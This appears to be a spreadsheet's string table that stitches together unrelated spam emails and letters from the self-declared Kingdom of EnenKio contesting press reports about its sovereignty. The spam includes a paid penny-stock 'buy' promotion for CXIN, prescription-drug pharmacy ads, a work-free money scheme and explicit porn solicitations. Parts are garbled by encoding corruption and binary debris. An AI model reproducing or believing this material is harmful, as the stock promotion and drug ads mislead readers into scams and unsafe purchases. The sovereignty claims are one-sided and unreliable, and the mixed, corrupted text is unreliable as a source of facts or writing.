 The compact Flat Hose is made of a tough yet flexible 
            material so it will last. Flat Hose winds up easily, without twisting for trouble free storage 
          anywhere.Rubber hoses can weigh up to fifteen pounds, but the 
            Flat Hose is so lightweight that you can easily move it for any job, 
            anywhere.  If you order in the next 72 hours, 
          your FLATHOSE comes with these Great Accessories &amp; Options:
          (A $20.00 Value)
â€¢ Convenient Storage Reel
          â€¢ An Additional 25 Feet: For a limited time, get a 50 foot Flat 
          Hose for just $15 more!
          â€¢ Spray Gun: Includes a special chamber for adding soap or fertilizer!
ORDER 
          NOW 
Â   
        Click here to see HUNDREDS of As Seen On TV products
        ---Direct from the Manufacturers. 
Â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t>
  </si>
  <si>
    <t xml:space="preserve">SPECIAL ALERT&lt;!--li.MsoNormal{mso-style-parent:"";margin-bottom:.0001pt;font-size:12.0pt;font-family:"Times New Roman";margin-left:0in;margin-right:0in;margin-top:0in}.contenttd{font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11px;color:#333333}#content{position:absolute;width:385px;z-index:1;left:0;top:0}--&gt;THE WALL STREET WEEKLYStock Pick of The Day: China Xin Network Media Corp.Â  (OTC BB:CXIN)Â Â OPINION:Â Â Â Â  BUYSYMBOL:Â Â Â  CXINIndustry:Â  PublishingShort Term Opinion:Â OutperformLong Term Opinion:Â AccumulateRecent Price:Â Â Â Â Â  $0.0512 Month Trading Range:$0.07 - $0.95Avg. Volume:Â Â Â Â  47,940Approx. Float:Â Â  5 MillionInsider &amp; Institutional Holdings:92% SharesÂ Â Â " CXIN MEDIA CORPORATION, THE BLOOMBERG OF CHINA." - Finance and Investment Magazine, December 2001Â THE COMPANY:CXIN Media Corporation is an integrated media company focusing on the dissemination and aggregation of information. Currently, CXINs core business is in the publishing and aggregation of Financial, Economic, and Business Information on the Peoples Republic of China. The value CXIN Media provides is its ability to source, package, and present information that is highly in demand by the market.Apart from the core print and electronic publishing business, CXIN is involved in other related businesses, such as organizing and managing events such as conferences, seminars, and training in the field of wealth management and personal finance.These areas are closely linked to the core competencies of the company and they intend to leverage on the brands that they have built to further drive the growth potential.CXIN holds the key to success in the Peoples Republic of China. In May of 2001 they acquired the 12 year exclusive right from the China Economic Information Network, a corporation under the direct management of the State Information Center and the State Planning Development Commission, Chinas highest economic decision body.HIGHLIGHTS:May 2001, CXIN acquires the 12 year Exclusive license to distribute all information in English, French and Spanish, Internationally.February 2002, CXIN announced its first distribution contract with a leading market research provider.March 2002, CXIN announces it had signed with yet another distributor for its unique financial , economic and business information on the Peoples Republic of China.Â May 7, 2002, CXIN announces a distribution agreement with Internet Securities, a Euromarket company and the leading provider of emerging market securities.May 9, 2002, CXIN announces it had hired one of Asias top media consulting firms, Telesis, and its President, Mr. Cyril Pereira, the former Director of Operation of the South China Morning Post and Asia Magazine.June 12, 2002, CXIN launched its China Business portal and began selling subscriptions.June 24, 2002, CXIN announces the acquisition ofÂ  Smart Investor Magazine and related business. This magazine will bring over $1.2 Million in consolidated revenues.Â July 15, 2002, CXIN announces the license agreement with Lexis-Nexis, one of the worlds largest aggregators.INVESTMENT CONSIDERATIONS:According to the reports from Morgan-Stanley, which analyzes the worlds superpowers in 11 industries, it only takes 8 years to build a media empire, which means the return on investment in this industry will be far greater than that of pharmaceutical, household merchandise, energy, or even banking. We believe that CXIN Media is well positioned to become the next superpower of the media market in the fast growing Chinese market. The superior management and its exclusive agreement granted by the Chinese government provide the company with an "unfair advantage" over its potential competitors. We believe that the recent license agreements signed with some of the largest information providers in the world as well as the Smart Investor Magazines and related business will enable the company to meet its revenue and profit expectation of $50 Million within the next 5 years and dependent on market condition for refinancing, we foresee that CXIN Media could easily double their expected revenue and profits through strategic acquisitions. The current price of the shares do not reflect the value of this growth company, in comparison to the sector CXIN Media should be currently trading between $0.25 to $0.50 and above this value when we take into consideration the growth factors.Disclaimer: The Wall Street Weekly provides information on selected companies that it believes has investment potential. The Wall Street Weekly is not a registered investment advisor or broker - dealer. This report is provided as an information service only, and the statements and opinions in this report should not be construed as an offer or solicitation to buy or sell any security. The Wall Street Weekly accepts no liability for any loss arising from an investors reliance on or use of this report. An investment in CXIN is considered to be highly speculative and should not be considered unless a person can afford a complete loss of investment. The Wall Street Weekly has been retained to distribute this report on CXIN and has been paid six hundred dollars by a third party. This report involves forward looking statements, which involve risk, and uncertainties that may cause actual results to differ materially from those set forth in the forward - looking statements. For further details concerning these risks and uncertainties, see the SEC filings of CXIN including the companys most recent annual and quarterly reports.If you wish to no longer receive your FREE subscription or have received this report in error, please click HERE.--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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Royal Meds
your online pharmacy Â· Click HereYour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Such as:
Less than $7.00 per dose
Viagra Intended for men with erectile dysfunction (ED), it helps most men to get and keep an erection when they get sexually excited. No need to go through embarrassing, stressful situation anymore, you can now get Viagra from the comfort of your home. Click HerePhentermine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Click HereZyban is the first nicotine-free pill that, as part of a comprehensive program from your health care professional, can help you stop smoking. Its prescription medicine available only from your health care professional for smokers 18 and older. Click HerePROPECIA is a medical breakthrough. The first pill that effectively treats male pattern hair loss on the vertex (at top of head) and anterior mid-scalp area. Click Here
Â Â Â Â Â Â Â Unsubscribe Information:
This email is intended to be a benefit to the recipient. If you would like to opt-out and not receive any more marketing information please click on the following link http://194.44.46.21/remove.php . Your address will be removed within 24hrs. We sincerely apologize for any inconvenience.vfyxeuedwacdjxriumtvrkybkfketsuq--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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ì‹ ì„ í•œ ì´›ë¶ˆ íŒŒí‹°ì— ì´ˆëŒ€ í•©ë‹ˆë‹¤Â ì‹ ì„ í•œ
ì´›ë¶ˆ íŒŒí‹°ì— ì´ˆëŒ€ í•©ë‹ˆë‹¤
Â 
Â ì´›ë¶ˆ ì´ë²¤íŠ¸ë¥¼ ìƒê°í•´ ë³´ì…¨ë‚˜ìš”?
ìƒ‰ë‹¤ë¥¸ ê°ë™ì„ ì „í•´ë³´ê³  ì‹¶ë‹¤êµ¬ìš”?
ì—¬ê¸°ì— Â ì§€ê¸ˆê¹Œì§€ ëŠê»´ë³´ì§€ ëª»í–ˆë˜ ì‹ ì„ í•œ ì•„ì´ë””ì–´ê°€ ìžˆìŠµë‹ˆë‹¤
~ì§ì ‘ ì›í•˜ëŠ” ê¸€ì”¨ë¥¼ ì¨ ë‚˜íƒ€ë‚˜ê²Œí•˜ëŠ” ë©”ì‹œì§€ì´ˆ
~í•˜ë‚˜ì— ì í™”í•˜ë©´ 19ê°œê°€ ë™ì‹œì— ì í™”ë˜ëŠ” ì—°ê²°ì´ˆ
~ë…íŠ¹í•œ í–¥ìœ¼ë¡œ ë§ˆìŒì„ ë…¹ì´ëŠ” í¬ë¦¬ìŠ¤íƒˆ ëž¨í”„...
Â Â Â Â Â Â Â http://www.hiart.net
Â 
Â ì§€ê¸ˆ ë°©ë¬¸í•˜ì‹œë©´ íŠ¹ë³„ ì‚¬ì€í’ˆë„ ë“œë¦½ë‹ˆë‹¤
Â 
ì‚¬ì „ ë™ì˜ì—†ì´ ë©”ì¼ì„ ë°œì†¡í•œì  ëŒ€ë‹¨ížˆ ì£„ì†¡í•©ë‹ˆë‹¤
ë³¸ë©”ì¼ì€ í•œë²ˆë§Œ ë°œì†¡ë˜ëŠ” ì¼íšŒìš©ì´ë¯€ë¡œ ìˆ˜ì‹ ê±°ë¶€ê°€ í•„ìš”ì—†ìŠµë‹ˆë‹¤
Â Â 
ï¦†ï¿½:_x0012_â…¸ï¿½yï¿½aNï¿½ï¿½j`ï¿½jï¿½Sï¿½*Zï¿½8bê½ï¿½zå±¢j)bê½ˆhï¿½ï¿½+yè³š%â•€zë‹¯{
+ï¿½ï¿½_x001F_jï¿½^ê¾œ+ï¿½_x0008_ï¿½ï¿½ï¿½ï¿½ï¿½ç—²yï¿½&amp;ï¿½ç¾½qï¿½bï¿½{)ï¿½ï¿½_â–·ï¿½ï¿½{cëµ™H0_x001B_ï¿½ï¿½å¹•ï¿½xmï¿½ï¿½ï¿½ï¿½_x000C_#iëœ…ï¿½ï¿½&amp;ï¿½ï¿½_x001D_ï¿½ï¿½bï¿½*Zï¿½ï¿½,jï¿½"ï¿½(ï¿½ï¿½ç¢¼ï¿½ï¿½ï¿½ï¿½Xï¿½ï¿½XÐ£*Zï¿½ï¿½,jï¿½"ï¿½(ï¿½ï¿½ç¢¼ï¿½ï¿½bê¾¼,ï¿½è¤˜yï¿½+ï¿½ç¥ï¿½_x001B_mâ”©ï¿½ï¿½+-ê½ˆ.ï¿½ï¿½ï¿½â—€_x001E_ï¿½ï¿½ï¿½+-ë†¨bê¾œï¿½~ï¿½ä¼Šï¿½ï¿½ê¼¿Ð )ï¿½ï¿½_x0008_mï¿½x,</t>
  </si>
  <si>
    <t xml:space="preserve">This is not spam.  Thanks for posting to our promotional web sites. If you 
wish to no longer receive email from us at this email address, or if you feel  
you received this email in error please send an email message to 
solution244@hotmail.com with "Remove" placed in the subject line
Dear Friend,
We are desparately looking for 100 lazy people
who wish to make lots of money without working.We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graduates.We want the laziest people that exist - the guys and
gals who expect to make money without lifting a finger.
We want the people who stay in bed until noon.
We want those of you who think that getting out of bed to go
lay on the couch is an effort that is best not thought about.If you meet this criteria, go to this site and join free:http://www.roibot.com/w.cgi?R64190_funprogramIn case you haven't figured it out yet, we want
the kind of people who DO NOT take risks.
If you are the kind of person who will consider doing
something that's NOT a 'sure thing', then do NOT respond.
This is too easy a way to make money
and there's no challenge in it.If you can get to the website, you will be able to see the first home 
business in history that requires no work.  NONE.By clicking on this link and going to
this website, you will be aknowledging the fact that you
want to make enough money that you can quit
your regular job and sleep all day.We are not looking for a commitment from you
and we don't even want your money.
As a matter of fact, we don't even want you
to hear from us again if the idea of making lots
of money without working does not interest you.So if nothing else, remember this -to make money without working for it just
"Join Free".  Simple as that.http://www.roibot.com/w.cgi?R64190_funprogram 
We look forward to hearing from you.In all seriousness,This is NOT a "no work" program that will make you money without lifting 
a finger. Advertising effectively requires WORK and plenty of it. Oh, for sure, it's 
not like picking cotton under a broiling sun, but it IS work, nonetheless. And we DO want peoples' money ONLY when they see the value of our 
products, services and upgrades. We look forward to hearing from you. Cordially your lazy friend, Theresa Brown
We have 10 EXTREMELY TARGETED SAFE-LISTS for you to use daily 
in your advertising campaign! This is spam-free, worry-free advertising at 
its best!
http://www.roibot.com/w.cgi?R64190_safelist 
Get Your Promotion To Prosperity &amp; Peace
Sow A Seed And GOD Will Meet Your Need!Give To Your Local Charitable Organization
Life In The Word
WWW.JOYCEMEYER.ORGSuccess Begins In The MIND! ***MAKE IT A GREAT DAY*** </t>
  </si>
  <si>
    <t xml:space="preserve">################################################
#                                              # 
#     Free Hardcore Porn - VIP Membership      #
#                                              # 
################################################YOUR INSTANT ACCESS PASSWORD
LOGIN NAME:   cpunks@minder.net 
PASSWORD:     EzKWGy4HNaughty Live Cam 
http://157.237.128.20/cams/?aid=603367 Teen Sex Dolls 
http://157.237.128.20/teen/?aid=603367 Play House Porn 
http://157.237.128.20/play/?aid=603367 WHAT YOU GET FOR FREE:
Â· XXX Hardcore Videos 
Â· Live Feeds 24-7 
Â· One on One Chat 
Â· Spy Cams 
Â· Games
Â· Daily Teen Sex Pic 
Â· Lesbian Teen-Sex 
Â· Oral Sex 
Â· Big Boobs
Â· Voyeur Cams
Â· XXX Porn Movies 
Â· Live Fucking 
Â· Cum Shots 
Â· Domination 
Â· Group Sex
Â· Pissing Cams
Â· Exclusive Centerfolds 
Â· Freaky Sex 
Â· Shower Cams 
Â· Asians 
Â· Erotic Stories
Â· Amateur Videos
Â· Fantasy Babes 
Â· Adult XXX TV 
Â· Hardcore Mags 
Â· Nude Celebs 
Â· Facials
Â· And More..Removal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Please allow 24hours for removal.This e-mail is sent in compliance with the Information Exchange Promotion and Privacy Protection Act. section 50 marked as 'Advertisement' with valid 'removal' instruction.vkhehrhnygrhfgolrckpvffrkrrhipuwo--DeathToSpamDeathToSpamDeathToSpam--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</si>
  <si>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If Amateurs is what you want,  Then we Have them.
Take a look at these HARDCORE sites.  Young HOTTT TEENS !!!These are The BEST of the BEST when it comes to Amateurs.
Don't believe me?   Take a look for yourself.  
  Amateur Petite
-----------------------All Natural TIGHT Coeds !!!
Petite Natural Breasted Amateurs!!
Exclusive Amateur XXX Videos !!!
Hundreds of Exclusive PETITE Amateur MODELS !! Click Here to Check Out the ACTION!!!!
 http://tour2.amateurpetite.com/?1087
 http://tour2.amateurpetite.com/?1087
  Ample Amateurs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</si>
  <si>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 xml:space="preserve">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DEMOEliminate or Reduce Travel ExpenseTry this on for savings... 
and turn those unnecessary trips into problem solving and fact finding conferences, 
saving time and wear and tear on your overworked business staff. To find out more about this revolutionary concept,
fill out the form below.
Required Input Field*Name*
Web 
            Address
Company 
            Name*            State*
Business 
            Phone*
Home 
            Phone
Email 
            Address*
All information given herein is strictly confidential and will not be re-distributed
      for any reason other than for the specific use intended.
To be removed from our distribution lists, please  
      Click 
      here..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</si>
  <si>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c.l.kyle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</si>
  <si>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To be taken off this mailing list, simply hit your
reply button and put "Remove" anywhere in the subject.
----------------------------------------------------------
  If Amateurs is what you want,  Then we Have them.
Take a look at these HARDCORE sites.  Young HOTTT TEENS !!!These are The BEST of the BEST when it comes to Amateurs.
Don't believe me?   Take a look for yourself.  
  Amateur Petite
-----------------------All Natural TIGHT Coeds !!!
Petite Natural Breasted Amateurs!!
Exclusive Amateur XXX Videos !!!
Hundreds of Exclusive PETITE Amateur MODELS !! Click Here to Check Out the ACTION!!!!
 http://tour2.amateurpetite.com/?1087
 http://tour2.amateurpetite.com/?1087
  Ample Amateurs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</si>
  <si>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 xml:space="preserve">
Free Porn Passwords
I 
                      Know You want Pics of Hot Babes Right? I Bet You Want to 
                      get into 
                      the Best Porn Sites for Free too?  
                      Here's a secret:
&gt; 
                      &gt; Get Into Paysites Free!&lt; &lt;
Take
a minute to 
                      read what I've got to tell you, and will have full access
to 
                      some of the internet's HOTTEST membership sites for FREE.CLICK HERE
This costs 
    nothing!
Note: 
	 this is not a spam email. This email was sent to you because your email was 
     entered in on a website 
	 requesting to be a registered subscriber. If you would would like to be removed 
     from our list,
CLICK 
  HERE TO CANCEL YOUR ACCOUNT and you will *never* receive another 
  email from us!
</t>
  </si>
  <si>
    <t>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CommuniquÃƒÂ©,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the following line by line correction. For your convenience, your
text will be set off (with "**") in color:
**DOM is located on Karitane Island and now includes the Taongi Atoll in
the Northern Atolls of the Marshall Islands in the South Pacific 1000
miles south of Tahiti.**
(Comment: The construction of this statement implies the Marshall
Islands are in the South Pacific Ocean 1000 miles south of Tahiti, in
which case a reader may be misled.)
Correction: DOM is located on Karitane Island in the South Pacific, 1000
miles south of Tahiti, and now includes Taongi Atoll in the Northern
Atolls of the Marshall Islands in the North Pacific.
**However, the Marshall Islands government has condemned the "fraudulent
assertions" of two organizations, ...**
(Comment: Just because the RMI government "...has condemned the
'fraudulent assertions' ...of ...EnenKio...", does that make it true?
Why would you want to quote anything from a government that has been
internationally criticized [and documented] time and again for fraud,
abuse of human rights, outright theft and is in default on almost every
financial obligation it has ever made? What purpose do you propose to
serve by attacking a concerned group of dedicated people fighting for
the very lives of Marshallese natives who have been overrun by foreign
invaders, bathed in radiation from nuclear fallout and abused by their
own corrupt government?)
**...namely the DOM and sister nation, the Kingdom of EnenKio (the
Marshallese name for Wake Island),...**
(Comment: Nothing could be further from the truth. we cannot speak for
DOM, but as for the Kingdom, we don't even know what being a "sister
nation" means and for you to make this categorically false statement is
not only a blatant sign of ignorance of the state of EnenKio, it is a
deceptive intrusion upon the sovereign, His Majesty King Remios, the
sovereign of EnenKio and Eneen-Kio Atoll, and an inexplicable and
irresponsible abuse of journalism. Doesn't anybody check sources
anymore?)
Correction: The Kingdom of EnenKio is an independent sovereign state and
the same could be said for DOM.
**...claiming to represent the mid-Pacific nation amid an alleged
investment scam according to an article in Agence France- Presse.**
(Comment: The government of the Kingdom of EnenKio represents the people
of EnenKio, who are forced to live in exile from Eneen-Kio Atoll, lands
and seas that played a significant role in Marshallese culture for
perhaps 2000 years. Furthermore, "...an article in Agence France-Presse"
has no merit as it was authored by a source in the Marshall Islands
government. My preceding comments apply. The Kingdom of EnenKio is not
now and never has been engaged in an "...investment scam...". We have
tried for many years to attract qualified investors and funding sources
for programs that will not only benefit the people of EnenKio, but also
will positively impact people around the globe. In fact, we are
currently working with a former NASA Astronaut. One tool scammers have
in their arsenal is to discredit visionary programs of legitimate
entities so they can feed on carcasses of the ignorant. Many journalists
use the same technique to sell their stories on sensationalism. Doesn't
anybody check sources anymore?)
**The Marshall Islands foreign ministry has issued warnings to countries
against acknowledging any fraudulent claims made by representatives of
either nation.**
(Comment: The Kingdom of EnenKio has made no "fraudulent claims" of
which I am aware, and in my post, I am responsible for all published
information. I would personally caution any "..countries against
acknowledging any fraudulent claims made by representatives of..."
nations, companies or publications if I had credible proof to that
effect. However, my preceding comments apply as to credibility of any
RMI ministry source. Furthermore, the RMI has repeatedly attacked the
credibility of His Majesty King Hermios, who happens to be the ancestral
sovereign owner under Marshallese custom of over 1/3 of the land in the
Marshall Islands, including recent attempts to sequester him against his
will. We believe some officials in the RMI are afraid of what will
happen to them if honesty and integrity returns to the administration of
lands and programs to assist the people with their pressing needs and
they no longer have their hands on the till. To perpetrate their
jaundiced agenda is an irresponsible abuse of journalism.)
**A Honolulu-based attorney created the "Kingdom of EnenKio" in the
early 1990s.**
(Comment: Mr. Moore is not an Attorney, though he was living in Honolulu
in the early 1990s.)
Correction: The Kingdom of EnenKio was established by decree of the
owner of Eneen-Kio Atoll [a.k.a. Enen-kio, Halcyon, Disclerta, Wake and
6-8 other names], Iroijlaplap Murjel Hermios, who then was Paramount
Chief of the Northern Ratak atolls [he passed away in December 1998] and
was fully recognized by the RMI government. He declared the sovereign
state of EnenKio in 1994, whereupon the people chose him as their King
over Eneen-Kio Atoll, ratified the Constitution and established
government as a limited constitutional monarchy.
**It was based on a power of attorney agreement with Marshall Islands
paramount chief Mursel (sic) Hermios, which granted the attorney broad
powers to act on his behalf.**
Correction: The establishment of the Kingdom of EnenKio was made
possible by Murjel's appointment of Mr. Robert Moore, the adopted
brother of Hermios, Alab of Taongi Atoll and a private citizen, to the
post of Minister Plenipotentiary. The document of appointment was also a
Special Power of Attorney which granted Mr. Moore very specific
instructions to do whatever was possible to expel the United States from
Eneen-Kio Atoll and establish an independent state on Hermios' and the
people's behalf.
**The Marshall Islands High Court has ruled the agreement invalid and
ordered it nullified, which the "kingdom" has disputed.**
(Comment: Since when is a Special Power of Attorney an "agreement"? The
Marshall Islands High Court has no record or knowledge of the Special
Power of Attorney, except as has been publicized by the Kingdom of
EnenKio, and certainly exercises no jurisdiction over Eneen-Kio Atoll,
which lies over 100 miles north of lawful RMI boundaries. The RMI has no
political or territorial jurisdiction over the islands and seas of
Eneen-Kio Atoll because the atoll, by any name you choose, was not
incorporated into the RMI when it formed its government in 1979, nor was
it subsequently incorporated by any act, law, mandate or otherwise of
any present or former Iroijlaplap or Monarch of Eneen-Kio and any
statement to the contrary is false, fraudulent and irresponsible.)
Finally, I suggest you, as a journalist or publisher, do a little more
research, not only into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and documents
mentioned above, all of which exist in hard copy (not in 'cyberspace')
and most of which are referenced or published at our official web site.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 if corrected
elsewhere, that a link be provided to the relevant paragraph cited above
in the article.
SKIP TO NEXT FILE Â TOP OF PAGE
June 3, 1999- Sir: The following report was sent to me in which the
author mentions the Kingdom of EnenKio (thank you for spelling 'EnenKio'
correctly. The purpose of this letter below is to lodge a formal request
for correction of false and misleading statements made by the author
regarding the Kingdom of EnenKio.
"Fantasy Island" -- "Melchizedek passport scam reveals how the Internet
can take fraud to new frontiers" By Bertil Lintner in Bangkok, December
10, 1998: "Determined not to give up, Pedley moved his fictional nation
once again, this time to Taongi atoll in the Western Pacific. According
to a Melchizedek press release, posted on its home page, Taongi was
leased in 1997 under a treaty with representatives of "the kingdom of
EnenKio," another only-in- cyberspace country, which in this case claims
the U.S.-held Wake Island. In real life, Taongi is an uninhabited atoll
in the Marshall Islands."
http://www.feer.com/Restricted/index_corrections.html (link to article
of December 24, 1998: "Fantasy Island", disconnected as of 2/1/00)
Response to the author: I am unable to locate the "Melchizedek press
release" you cited, indicating that "...Taongi was leased in 1997 under
a treaty with representatives of "the kingdom of EnenKio,...". Such an
act would be impossible and implausible as EnenKio has no legal
authority or political jurisdiction over Taongi Atoll in the Marshall
Islands. Further more, Melchizedek (DOM) is not so uninformed as to
publicly advertise an illegal act in the midst of attempting to find a
suitable land base for its people to administer their form of
government.
The Kingdom of EnenKio did enter into a treaty with DOM on the 19th day
of September, 1997, but it did not convey a lease of land. It declared a
state of peace and established diplomatic recognition between our
governments. However, a prior agreement, signed in May 1997, which had
nothing to do with the Kingdom of EnenKio, transferred Mr. Robert
Moore's rights to develop Taongi from Mr. Moore to DOM. It did not
convey a lease at that time and no such document is in existence.
This was made possible because Mr. Moore is the Alab (one class of
landowner) of Taongi and had a legal power of attorney pertaining to
Taongi Atoll, from the principal landowner, Iroijlaplap (Paramount
Chief) Murjel Hermios, who was aware of and supported the transaction.
Consideration, if any, under the agreement was personally retained by
Mr. Moore, who is also the adopted brother of Hermios.
Now, please understand, that while Mr. Moore was acting in the latter
case on his own behalf, and that of the future use and development of
Taongi, which would have generated an income to Iroijlaplap Hermios, Mr.
Moore wears another hat as Minister Plenipotentiary of the Kingdom of
EnenKio. Iroijlaplap Hermios, also wore (he died in December 10, 1998,
the same date of your article) other hats: one as First Monarch, King of
the Kingdom of EnenKio and one as owner in allodium of Eneen-Kio Atoll
(a.k.a. Enen-kio, Halcyon, Disclerta, Wake and several other names).
For you to state the Kingdom of EnenKio is "...another only-in-
cyberspace country...", as you did in the above article, is not only a
completely and categorically false statement, but it is a blatant sign
of ignorance of the state of EnenKio. And, it is a blatant deceptive
intrusion upon His Majesty King Hermios, the sovereign of EnenKio and
Eneen-Kio Atoll, and an inexplicable and irresponsible abuse of your
journalistic license -- unless, of course, your statement could be
proved accurate.
I suggest you do a little more research, not only into the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all of which exist in hard copy (not 'cyberspace') and
most of which are referenced or published at our official web address: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that the link be
added to the relevant paragraph cited above in the article.
SKIP TO NEXT FILE Â TOP OF PAGE
June 2, 1999- Sir: The following statement (in quotes) was copied from
one of your Footnotes to History -D and E (disconnected as of 12/1/00).
"Enenkio Atoll- In 1898, the United States annexed Wake Island, in the
Marshall Islands of the western Pacific. After the Marshalls became a
U.S. Trust Territory, the traditional chiefs of the area agitated for
recognition that Wake Island was a part of the Marianas chain, and
pressed their historical claims to the atoll, called Enenkio locally.
The U.S. government has consistently ignored these claims. The protests
took a sharper turn after the U.S. Congress in 1993 acknowledged the
illegality a hundred years earlier of the establishment by Americans of
the Republic of Hawai'i. King Murjel Hermios, who is paramount chief of
an archipelago in the northern Marshalls, declared Wake Island's
independence in 1987.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Comment: With all candor, I cannot figure how such straight forward
facts such as we have presented to the public and over the Internet
since 1994 could have possibly been construed into the above referenced
text. While I am pleased to find you have apparently taken a very
serious interest (unless your site is intended as some twisted joke,
which I am assuming is not the case) in the history of the Kingdom of
EnenKio, I am aghast at how distorted, erroneous and misleading your
summary is. As a consequence of my service to His Majesty King Remios
and the people of EnenKio, I will respectfully offer the following line
by line correction. For your convenience, your text will be set off
(with "**") in color:
**In 1898, the United States annexed Wake Island, in the Marshall
Islands of the western Pacific.**
Correction: In 1898, the United States invaded Wake Island, the
northernmost atoll -- actually named Eneen-Kio centuries before western
explorers arrived -- of the Ratak chain of Marshall Islands in
Micronesia and the Central North Pacific Ocean.
The Author responds: "Rest assured that I did not mean to downplay the
role of violence in the American acquisition of the territory."
**After the Marshalls became a U.S. Trust Territory, the traditional
chiefs of the area agitated for recognition that Wake Island was a part
of the Marianas chain, and pressed their historical claims to the atoll,
called Enenkio locally.**
Correction: Following W.W.II, the Trust Territories of the Pacific,
which included the Marshall Islands, was placed under administration of
the United States by the United Nations. While Eneen-Kio was well
established as one of the Marshalls, the U.S. only knew it as Wake and,
having lost many U.S. lives there in 1941 at the hands of Japanese
invaders, kept control of it. In 1993, the Paramount Chief of the Ratak
atolls pressed his clan's historical and lawful claim to the 3 islands
of Eneen-Kio Atoll.
The Author responds: "I don't see much conflict between the two versions
here."
**The U.S. government has consistently ignored these claims.**
Correction: The U.S. government has consistently ignored claims from the
Marshall Islands government, which failed to exert a claim during its
move to independence in 1979, and from the former traditional
landowners, including Iroijlaplap Murjel Hermios.
The Author responds: "I will note this."
**The protests took a sharper turn after the U.S. Congress in 1993
acknowledged the illegality a hundred years earlier of the establishment
by Americans of the Republic of Hawai'i.**
Correction: The Eneen-Kio claims gained some new momentum after
precedents were set by the U.S. Congress, when in 1993 they acknowledged
the illegality of the 1893 overthrow of the Monarch of the Kingdom of
Hawai'i by a group of American businessmen and U.S. Marines, and in the
following year returned the island of Kaho'olawe to the Hawaiian People.
**King Murjel Hermios, who is paramount chief of an archipelago in the
northern Marshalls, declared Wake Island's independence in 1987.**
Correction: King Murjel Hermios, who was Paramount Chief until his death
in December 1998, declared the sovereign state of EnenKio in 1994,
whereupon the people chose him as their King over Eneen-Kio Atoll,
ratified the Constitution and established government as a limited
constitutional monarchy.
The Author responds: "I will make the necessary corrections here."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Correction: After the death of the First Monarch, his brother Remios
succeeded to the throne as Second Monarch and rules along with his
brother, Crown Prince Lobadreo, over the Kingdom of EnenKio today.
To continue the commentary: The parts left out were either wrong or have
nothing to do with the history of the Kingdom of EnenKio itself. Since
HM King Remios also succeeded to Iroijlaplap of the northern Ratak
atolls of the Marshall Islands, he also has responsibilities over 10
atolls, 2 islands and over 300 atoll islets. But that is another story,
which has nothing directly to do with the Kingdom of EnenKio. I have
offered this treatise in hopes that you will find the time to correct
your site per my suggestions. Please feel free to contact me or view our
pages at the address above. Thank you in advance for your attention and
interest in this matter.
The Author responds: "I imagine that you are asserting here that Moore's
Melchizedek project (which can be located on the web through the Sources
&amp; Bibliography section of my web page) is non-existent. Be assured I
will look further into\par this. Thank you again for your response,
Captain Rydell. I should be posting a revised version of the page in the
next week or so." (June 7, 1999)
SKIP TO NEXT FILE Â TOP OF PAGE
June 1, 1999: News Release
Part One Background:
On May 21, 1999, the Ministry of Foreign Affairs and Trade of the
Republic of the Marshall Islands posted a "press release" on the
Internet at: http://www.yokwe.net/mboard/newsinfo/thread.cgi?67,0\cf0
(discontinued as of 12/1/00). The author, "Mr. Joseph Biglar,
Undersecretary", is not known to us, has not heretofore communicated
with the government of the Kingdom of EnenKio, nor with its Monarch, His
Majesty King Remios, at any time and has no knowledge of any policies or
state activities of EnenKio. There is no valid reason to assume that the
said "press release" is indeed an official document.
The Republic of the Marshall Islands has perfect knowledge that
representatives of the Kingdom of EnenKio, headed by His Majesty King
Remios, on the basis of his proper and lawful authority, have the right
and obligation to speak in support of the interests of certain persons,
many of whom happen to be Marshallese nationals residing in the Marshall
Islands.
Response to so-called "Press Release":
This unprovoked attack upon His Majesty King Remios, Monarch of the
Kingdom of EnenKio, by the Ministry of Foreign Affairs and Trade of the
Republic of the Marshall Islands is wholly false. It is also
unjustifiably inflammatory and amounts to little more than an
unquestionable confirmation of the predilection for infringement upon
Marshallese sovereign rights exercised by the current administration of
the Republic of the Marshall Islands, which has been confirmed by the
U.S. State Department. (See: Human Rights Report)
This public posting shall serve as constructive notice to the Marshall
Islands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The RMI is unequivocally cognizant that the Kingdom of EnenKio:
Ã‚Â» Ã‚Â» exists as a sovereign state as defined by the Montevideo
Convention (1933).
Ã‚Â» Ã‚Â» was conceived as a separate independent state by its
sovereign,
Iroijlaplap Murjel Hermios, in 1987.
Ã‚Â» Ã‚Â» was established by way of a public authority, the
Constitution
of the Kingdom of EnenKio Atoll, ratified in 1994 by its people.
Ã‚Â» Ã‚Â» has negotiated diplomatic and trade treaties with many
other
states, including the Dominion of Melchizedek
Ã‚Â» Ã‚Â» has asserted political and territorial jurisdiction over
islands
and seas which lie entirely outside and well beyond the area defined as
- now quoting Mr. Biglar's statement - "RMI geographical and political
boundaries."
Ã‚Â» Ã‚Â» exercises authorities founded upon prehistoric traditional
and
matriarchal ancestral rights and titles bestowed, under the sacred
heritage of Marshallese customary law (reinforced by the RMI
Constitution), upon the acknowledged Iroijlaplaps of the Northern Ratak
atolls, whose authority is certainly not subject to scrutiny by Ministry
of Foreign Affairs and Trade of the Republic of the Marshall Islands.
Ã‚Â» Ã‚Â» has not subjugated, assigned or encumbered any of its
political
jurisdiction within its defined territorial boundaries of islands and
seas of Eneen-Kio Atoll to the government or people of the Dominion of
Melchizedek or to any other entity, including the Republic of the
Marshall Islands.
Mr. Biglar is unequivocally cognizant that the Republic of the Marshall
Islands:
Ã‚Â» Ã‚Â» also exists as a sovereign state, defined by the
Montevideo
Convention (1933).
Ã‚Â» Ã‚Â» was conceived as a separate state by (UN) foreign
governments,
which included the United States, China and the USSR.
Ã‚Â» Ã‚Â» was also established under a public authority, the
Constitution
of the Marshall Islands, ratified in 1979 by its people.
Ã‚Â» Ã‚Â» has no relations with EnenKio that allows RMI knowledge of
anything that is not also public information and no such public
information respecting relations with the Dominion of Melchizedek has
ever been disseminated to harm the RMI to be condemned by Mr. Biglar.
Ã‚Â» Ã‚Â» has no political or territorial jurisdiction over the
islands
and seas of Eneen-Kio Atoll, which was not incorporated into the RMI in
1979, nor subsequently incorporated by any act, law or mandate of any
present or former Iroijlaplap or Monarch thereof and any statement to
the contrary is fraudulent, as in the instant matter.
Ã‚Â» Ã‚Â» exercises authorities founded upon the RMI Constitution,
which
does not incorporate nor authorize political jurisdiction over
territorial boundaries that include the islands or seas of Eneen-Kio
Atoll and any statement to the contrary is fraudulent, as in the instant
matter.
Ã‚Â» Ã‚Â» has refused to acknowledge the leadership of the Kingdom
of
EnenKio in their every attempt to get the RMI government to mitigate the
